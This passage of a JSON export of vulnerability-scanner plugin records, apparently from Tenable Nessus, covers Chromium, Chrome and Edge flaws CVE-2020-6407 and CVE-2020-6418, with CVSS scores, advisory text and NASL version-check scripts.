CVE-2020-6407: Fixed an OOB memory access in streams (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\nNon-security issues fixed :\n\n - Dropped the sandbox binary as it should not be needed anymore (bsc#1163588).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2020-259)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-259.NASL", "href": "https://www.tenable.com/plugins/nessus/134157", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-259.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134157);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2020-259)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated to version 80.0.3987.122 (bsc#1164828).\n\nSecurity issues fixed :\n\n - CVE-2020-6418: Fixed a type confusion in V8\n (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams\n (bsc#1164828).\n\n - Fixed an integer overflow in ICU 
(bsc#1164828).\n\nNon-security issues fixed :\n\n - Dropped the sandbox binary as it should not be needed\n anymore (bsc#1163588).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163484\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163588\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1164828\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-80.0.3987.122-lp151.2.66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-80.0.3987.122-lp151.2.66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debugsource-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\n\nif 
(flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:17:11", "description": "The version of Microsoft Edge (Chromium) installed on the remote Windows host is prior to 80.0.361.62. It is, therefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds memory access error exists in Google Chrome. An unauthenticated, remote attacker can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6407)\n\n - A type confusion error exists in the V8 component of Google Chrome. An unauthenticated, remote attacker can exploit this, via a crafted HTML page, to potentially exploit heap corruption. 
(CVE-2020-6418)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-07T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 80.0.361.62 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_80_0_361_62.NASL", "href": "https://www.tenable.com/plugins/nessus/138176", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138176);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 80.0.361.62 Multiple Vulnerabilities\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge (Chromium) installed on the remote Windows host is prior to 80.0.361.62. It is,\ntherefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds memory access error exists in Google Chrome. An unauthenticated, remote attacker can\n exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6407)\n\n - A type confusion error exists in the V8 component of Google Chrome. An unauthenticated, remote attacker\n can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6418)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b4f0f972\");\n # https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ec7f076\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge (Chromium) 80.0.361.62 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\n\nconstraints = [{ 'fixed_version' : '80.0.361.62' }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:06", "description": "The version of Google Chrome installed is prior to 80.0.3987.122. 
It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-26T00:00:00", "type": "nessus", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-26T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "701270.PASL", "href": "https://www.tenable.com/plugins/nnm/701270", "sourceData": "Binary data 701270.pasl", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:37", "description": "The version of Google Chrome installed on the remote macOS host is prior to 80.0.3987.122. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. 
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "nessus", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "href": "https://www.tenable.com/plugins/nessus/133953", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133953);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Google Chrome < 80.0.3987.122 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web 
browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 80.0.3987.122. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aae39d39\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1045931\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1053604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1044570\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 80.0.3987.122 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/24\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'80.0.3987.122', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:51", "description": "The version of Google Chrome installed on the remote Windows host is prior to 80.0.3987.122. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. 
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "nessus", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_80_0_3987_122.NASL", "href": "https://www.tenable.com/plugins/nessus/133954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133954);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Google Chrome < 80.0.3987.122 Multiple Vulnerabilities\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 80.0.3987.122. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aae39d39\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1045931\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1053604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1044570\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 80.0.3987.122 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2020/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'80.0.3987.122', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T14:35:02", "description": "The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:0738 advisory.\n\n - ICU: Integer overflow in UnicodeString::doAppend() (CVE-2020-10531)\n\n - chromium-browser: Type confusion in V8 (CVE-2020-6383, CVE-2020-6418)\n\n - chromium-browser: Use after free in WebAudio (CVE-2020-6384)\n\n - chromium-browser: Use after free in speech (CVE-2020-6386)\n\n - chromium-browser: Out of bounds memory access in streams (CVE-2020-6407)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2020:0738)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10531", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6386", "CVE-2020-6407", "CVE-2020-6418"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:2.3:o:redhat:enterprise_linux:6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:rhel_eus:6.0:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:chromium-browser:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:rhel_els:6:*:*:*:*:*:*:*"], "id": "REDHAT-RHSA-2020-0738.NASL", "href": "https://www.tenable.com/plugins/nessus/134360", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:0738. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134360);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\n \"CVE-2020-6383\",\n \"CVE-2020-6384\",\n \"CVE-2020-6386\",\n \"CVE-2020-6407\",\n \"CVE-2020-6418\",\n \"CVE-2020-10531\"\n );\n script_xref(name:\"RHSA\", value:\"2020:0738\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"IAVA\", value:\"2020-A-0078-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2020:0738)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:0738 advisory.\n\n - ICU: Integer overflow in UnicodeString::doAppend() (CVE-2020-10531)\n\n - chromium-browser: Type confusion in V8 (CVE-2020-6383, CVE-2020-6418)\n\n - chromium-browser: Use after free in WebAudio (CVE-2020-6384)\n\n - chromium-browser: Use after free in speech (CVE-2020-6386)\n\n - chromium-browser: Out of bounds memory access in streams (CVE-2020-6407)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6383\");\n script_set_attribute(attribute:\"see_also\", 